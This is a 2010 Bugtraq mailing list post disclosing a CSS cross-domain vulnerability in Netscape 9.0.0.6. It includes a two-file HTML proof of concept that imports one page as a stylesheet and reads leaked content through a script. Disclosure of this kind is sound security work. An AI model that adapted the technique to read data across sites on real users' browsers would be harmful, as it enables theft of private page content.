Bugtraq mailing list archives
Netscape Web Browser (CSS) Cross Domain Vulnerability
From: info () securitylab ir
Date: Thu, 23 Sep 2010 10:51:35 -0600
PoC: 1.html: <body> {}body{DOM: Cross Domain Vulnerability 2.html: <style> @import url("1.html"); </style> <script> setTimeout(function(){ var s = document.body.currentStyle.DOM; alert(s); },0); </script> Vulnerable: Netscape v9.0.0.6 By: Securitylab.ir Original Advisory: http://Securitylab.ir/Advisories
Current thread:
- Netscape Web Browser (CSS) Cross Domain Vulnerability info (Sep 23)
- Re: Netscape Web Browser (CSS) Cross Domain Vulnerability Michal Zalewski (Sep 24)